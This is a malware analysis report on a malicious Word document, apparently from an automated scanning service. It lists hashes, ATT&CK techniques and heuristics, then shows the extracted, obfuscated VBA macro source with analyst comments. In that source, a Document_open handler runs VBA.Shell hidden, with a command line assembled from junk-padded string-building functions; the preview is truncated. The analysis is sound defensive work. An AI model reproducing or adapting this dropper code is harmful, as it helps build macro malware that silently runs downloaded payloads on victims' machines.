Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1782d1c2a904dd53…

MALICIOUS

Office (OLE)

148.2 KB Created: 2018-07-24 20:09:00 Authoring application: Microsoft Office Word First seen: 2020-04-06
MD5: a8f7d23ee22b05e9a207b41001162cfb SHA-1: 686faec0c7ff21f25d79bedb6fe077885c333ddd SHA-256: 1782d1c2a904dd53cc53996afcae3c7b8ee18422937faf65d0bb671cb7a9630f
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains VBA macros, specifically a Document_Open macro that uses the Shell() function. This indicates an attempt to execute arbitrary commands, likely to download and run a second-stage payload. The obfuscated nature of the VBA code and the use of Shell() suggest downloader or dropper functionality.

Heuristics 5

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 27016 bytes
SHA-256: d980162399db7de30c3cf1f96dfe1abbd149cebfcd2169dc6c4f3d3699c35e6b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "CnbHrvUltaijFo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: module header of the first extracted module. VB_Base =
' "1Normal.ThisDocument" together with VB_PredeclaredId/VB_Exposed = True is
' consistent with this being the document's own class module (ThisDocument),
' which is where the Document_open event handler below is hosted.
' The random-looking VB_Name is itself a weak obfuscation indicator.
' Analyst note: padding/junk function. The function name is never assigned,
' so it returns Empty; every statement assigns a name that appears nowhere
' else in the visible listing, and On Error Resume Next hides any failure
' from the calls on undefined operands (ChrB(GzwFd), Oct(UmjdTp), Chr(KSzzd)).
' Not referenced from any visible procedure (listing is truncated — confirm).
Private Function HocDsTTHVuf()
On Error Resume Next
   zjYVhm = ChrW(46)
   ZpXJMt = ChrB(GzwFd)
   QXPkwo = Hex(6756)
   KucXYD = Atn(708)
   LXiiAY = Oct(UmjdTp)
   Dutuki = Chr(KSzzd)
End Function
' Analyst note: padding/junk function of the same shape as HocDsTTHVuf —
' no return value assigned, assignments to names unused elsewhere in the
' visible listing, errors suppressed by On Error Resume Next.
' Not referenced from any visible procedure (listing is truncated — confirm).
Private Function JXtijzpKof()
On Error Resume Next
   Esvwa = Fix(Qibqsw)
   roaYr = IMkrEi
   nPuPUj = Hex(IOmzfi)
   WwoDR = CStr(izKOI)
End Function
' Analyst note: padding/junk function. The arithmetic on undefined names
' (e.g. 31542 / WQkjQz, JNiWWL / mhdMwl) would normally raise a division or
' type error; On Error Resume Next swallows it. No return value is assigned
' and nothing here feeds the Shell command string.
' Not referenced from any visible procedure (listing is truncated — confirm).
Private Function SbZqjwGbtqi()
On Error Resume Next
   MFVHsi = CByte(JAbcE)
   wYZPjw = Atn(31542 / WQkjQz * 27414 - 22678)
   DhsYi = CInt(66465 + BwvCtT + JNiWWL / mhdMwl)
   hGlFm = ChrW(FXfwQt)
   jGiOsm = Sgn(5)
   bnJLTq = lFRfJ
   Orwcra = 2343
End Function
' Analyst note: padding/junk function — same pattern as the others in this
' module (no return value, throwaway assignments, errors suppressed).
' Not referenced from any visible procedure (listing is truncated — confirm).
Private Function kUvSiHO()
On Error Resume Next
   RIvGFC = dESmPX
   wWGYD = MjBch
   PvdJzu = Rnd(4372)
   juiFFA = ChrW(1436)
   clINjj = Chr(fQZUwo)
End Function
' Analyst note: padding/junk function — no return value, four throwaway
' assignments, Cos(kCYPZ) on an undefined operand is masked by
' On Error Resume Next.
' Not referenced from any visible procedure (listing is truncated — confirm).
Private Function UFIMzaiGPAXQS()
On Error Resume Next
   AIbnb = 2
   wjTGw = 413068242
   vtArM = Cos(kCYPZ)
   iZHVa = ChrW(81)
End Function
' Analyst note: auto-execution entry point. Document_open is the Word event
' handler that runs when the document is opened (flagged on this page as
' OLE_VBA_DOCOPEN / OLE_VBA_PCODE_AUTOEXEC_EXEC); no user action beyond
' enabling macros is required.
' The only statement with an effect is the VBA.Shell call: the command line
' is assembled at runtime by concatenating the return values of 30+
' functions. Of those, cvNoiqIv and ZWRCGKEZ are defined in the second
' module below; the remaining names are not in the visible listing and are
' presumably further string-builder functions past the truncation point.
' The second argument, 0 (vbHide), launches the process without a visible
' window. The surrounding Tan/Cos/Sin/CByte assignments are padding.
' Detection angle: Shell() reached from a Document_open handler whose
' argument is a concatenation of call results, not a literal.
Private Sub Document_open()
On Error Resume Next
   aasAJ = Tan(939)
   jTvad = Cos(944)
   NdKiFE = WInad
   tiXMw = sKRCP
   LILiI = Sin(3)
' Command string built from function return values; window style 0 = hidden.
VBA.Shell "" + VhHmzhhouuwX + JjCDzVa + CVar("C") + ztmnCRiwjfmnGT + fwiAfhXDUQJz + cvNoiqIv + ZWRCGKEZ + TsijajOOKW + RszUsmRKJq + iPZYSdbG + NmJEoDfhQa + adQPBkC + iqkizOGVNQ + YFrTBF + UWismKwfr + XMFEt + LBwkLfLFT + ScljJWC + ifijNFLV + SXukAKzl + CNAvaGj + KoLkvBvnGd + zjVsZDmKHIp + BNbwh + lzXMNU + YtikrQ + LrHtzZw + GOaKbhdkiV + VirZozBOP + bJzEvSJ + WwJTRWjSmI + HTicYLzYlUHnj, 0
   sDOtkl = CByte(224800985)
End Sub
' Analyst note: padding/junk function placed after the entry point — no
' return value, throwaway numeric assignments, CDate(fjpZfB) on an undefined
' operand masked by On Error Resume Next.
' Not referenced from any visible procedure (listing is truncated — confirm).
Private Function uzXYzhkps()
On Error Resume Next
   ipFrj = CDate(fjpZfB)
   pFZMV = Int(6)
   fdiWD = 5
   XJmFX = 3979
   psmiCb = Sqr(271145631)
   KOzUA = Hex(441634975)
End Function
' Analyst note: padding/junk function — same pattern (no return value,
' unused assignments, errors suppressed). Round(34456 * ZJTcJF + ...) and
' Oct(AaSwaj) operate on names defined nowhere in the visible listing.
' Not referenced from any visible procedure (listing is truncated — confirm).
Private Function vujitMzIqkXDM()
On Error Resume Next
   OmmiLh = 8
   WRjzF = Round(92)
   ToFwm = CSng(97)
   AjDZu = Round(34456 * ZJTcJF + 19444 * 97925)
   XPwtG = fczlY
   GYpoa = Oct(AaSwaj)
   OFfpw = 80
End Function
' Analyst note: last padding/junk function of the document module — no
' return value, unused assignments; CBool(FDfSaJ / ZzKcr) would fail on
' undefined operands but is masked by On Error Resume Next.
' Not referenced from any visible procedure (listing is truncated — confirm).
Private Function BPqXbasP()
On Error Resume Next
   zXZzJN = Chr(mdBoYi)
   fkLUBb = FtNOV
   IFMOj = CBool(5228)
   ArqPYO = CBool(FDfSaJ / ZzKcr)
   pVmWj = 5
   IYjoi = CInt(PwiCp)
End Function


Attribute VB_Name = "SowcUVL"
' Analyst note: second extracted module (a standard module, judging by the
' absence of VB_Base/VB_PredeclaredId attributes — confirm). It holds the
' public string-builder functions whose return values Document_open
' concatenates into the VBA.Shell command line.
' Analyst note: string-builder fragment for the Shell command line.
' Returns zZYfNHWH + IfuzdCKOBBa + DCwwzTIc + ErhGThqL + nqfsBr; cvNoiqIv is
' one of the operands of the VBA.Shell call in Document_open.
' Obfuscation technique: fixed characters are split across many short
' literals (visible pieces include "CMd", "SET", "set", "%", "/" and "&"),
' and the remaining characters are produced by CStr(Chr(<sum>)) where the
' sum mixes one numeric literal (109, 99 or 34) with several names that are
' declared nowhere in the visible listing. With no Option Explicit and
' On Error Resume Next in force, those names likely evaluate as Empty (0),
' so the literal alone selects the character — confirm by emulation
' (e.g. the extracted-macro tooling already used on this page) rather than
' by hand. The interleaved Atn/CDate/Hex/ChrB/CBool/Cos assignments are
' padding and do not contribute to the return value.
Function cvNoiqIv()
On Error Resume Next
nslCB = Atn(1)
   RPFLT = Atn(24)
zZYfNHWH = CStr(Chr(dlrJbPWIlXGI + VpUjfwtazj + 109 + RQPivaHdOF + ThHNzYnNRlRJpo)) + "d rloZjw"
vDpOt = CDate(OPhXri)
   rcUFc = Hex(8)
IfuzdCKOBBa = "N" + CStr(Chr(sDlHiCz + GcfAWIQSXNwqj + 99 + vMHjwFpHQBk + POQkCUswIN)) + "FaHs fb" + "L" + "HaT" + "SSiE"
BEaYdD = 3060
   jVSCFA = BOpIkh
DCwwzTIc = "t" + CStr(Chr(BqSbMPMbKLV + GnRVPwlzw + 109 + wOoLjinz + zPXfDmX)) + "kqEUszC" + "WYOr lv"
nFcTBB = CDate(15108 + jBMcRJ)
   kvXdrO = ChrB(RuLXUw + rNnfJB)
ErhGThqL = "i" + CStr(Chr(DsVTvhbb + JiEnJfwaA + 109 + XWjMJYtpLMN + zQautiHCulCZs)) + "SrhXTv  & " + " %" + CStr(Chr(AFMWqcfWl + JhlhBvPRntED + 99 + kddkhmQwfp + qYKTtooGVaQNjG)) + "o" + CStr(Chr(oUvCfAFzCmE + MBwbCFrHTz + 109 + aBKMPAbdp + tDUqSLRH)) + "Sp"
zNqpW = CBool(43)
nqfsBr = "E" + CStr(Chr(kIYUlhBRTU + mEzvmnldqjF + 99 + YhOZvCs + pslsiTZLWnpOQP)) + "%  /" + CStr(Chr(YiVHiEDiRM + rXScArPGKuJS + 99 + KRAoIRXDXYX + kpDaRTnTw)) + " CMd" + "   /" + CStr(Chr(OYAkMiUDD + lhdEiOoAtEbbiR + 99 + rzPKLwmajQ + sDUURpDWwMkYf)) + "  " + CStr(Chr(JmzVSFJdDno + uDVRbzHqkHJpO + 34 + fOqfOVdomv + iaQjdGObsrTz)) + "  SET   " + "  lf7W=k" + "&   set   " + "a5=." + CStr(Chr(lZinjEUlzozIU + PiWGLZPTa + 99 + AJfovtwYjEJw + RwdbjUmuL)) + "o&"
' Return value: concatenation of the five fragments above, in order.
cvNoiqIv = zZYfNHWH + IfuzdCKOBBa + DCwwzTIc + ErhGThqL + nqfsBr
   OzHSA = Chr(NaJJi)
   NiKqX = Cos(29315692)
End Function
Function ZWRCGKEZ()
On Error Resume Next
jKTWYLcHiT = "&" + "    " + "sET    " + " ST" + "F=E" + "@ht"
UuOGRGRR = "&&" + " sET uYf" + "j=o&  " + "  SeT   ut" + "=/&& 
... (truncated)